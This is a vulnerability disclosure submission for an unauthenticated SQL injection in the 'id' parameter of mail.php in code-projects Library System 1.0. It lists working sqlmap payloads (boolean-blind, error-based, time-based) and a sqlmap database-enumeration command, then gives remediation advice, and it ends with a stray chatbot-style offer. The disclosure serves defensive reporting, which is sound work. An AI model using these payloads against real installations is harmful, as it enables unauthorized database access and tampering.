Submit #699534: code-projects Library System 1.0 mail.php SQL Injectioninfo

Titlecode-projects Library System 1.0 mail.php SQL Injection
Description # ???? Vulnerability Report: Code-Projects Library System Project V1.0 mail.php SQL Injection ## ???? Summary | Detail | Content | | :--- | :--- | | **Affected Product Name** | Library System | | **Affected Version** | V1.0 | | **Vendor Homepage** | `https://code-projects.org/library-system-in-php-with-source-code/` | | **Vulnerability Type** | SQL Injection (SQLi) | | **Affected File** | `/mail.php ` | | **Affected Parameter** | `id` (GET) | | **Authentication Required** | None (No login or authorization required to exploit) | | **Submitter** | yudeshui | ----- ## ???? Description and Impact ### Root Cause The vulnerability resides in the file `/mail.php`, where the application processes user-supplied input from the **`id`** (ID) parameter. The program **directly concatenates** this parameter value into the SQL query string **without sufficient cleaning, validation, or sanitization**. ### Impact A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including: * **Unauthorized Database Access:** Stealing sensitive data such as user information or book records. * **Data Tampering/Destruction:** Modifying, deleting, or adding records in the database. * **System Control:** In severe cases, gaining system-level control, posing a serious threat to system security and business continuity. ----- ## ????️ Vulnerability Details and PoC The vulnerability is located in the processing of the `id` parameter within a GET request. ### PoC Payload Examples The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool: ``` --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (7967=7967) THEN 1 ELSE (SELECT 4450 UNION SELECT 4905) END)) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1 OR (SELECT 8330 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(8330=8330,1))),0x716a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 8025 FROM (SELECT(SLEEP(5)))UtmF) --- ``` ### Sqlmap Screenshot Example (Database Enumeration) ``` sqlmap -u "http://dede:802/mail.php?id=1" --batch --dbs ``` ----- <img width="2349" height="1279" alt="Image" src="https://github.com/user-attachments/assets/6e81c0e9-afcc-4025-a6ae-c7d1806976d9" /> ## ✅ Suggested Repair Measures To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended: ### 1\. Use Prepared Statements and Parameter Binding (Primary Defense) This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code. * **Action:** Rewrite all database queries in `/mail.php` (and all other files) to use **Prepared Statements** (e.g., using **`mysqli_prepare()`** or **PDO** with parameter binding). ### 2\. Strict Input Validation and Filtering Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length. * **Action:** For parameters like `id` which should be numeric, use PHP functions like **`filter_var()`** or **`is_numeric()`** for strict checking. ### 3\. Minimize Database User Permissions Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions. * **Action:** Ensure the application's database user **does not** have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach. ### 4\. Regular Security Audits Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited. ----- Would you like me to provide a specific code example in PHP demonstrating how to use **prepared statements** to fix this vulnerability?
Source⚠️ https://github.com/rassec2/dbcve/issues/3
User
 yudeshui (UID 91129)
Submission11/21/2025 14:54 (5 months ago)
Moderation11/23/2025 10:43 (2 days later)
StatusAccepted
VulDB entry333344 [code-projects Library System 1.0 /mail.php ID sql injection]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!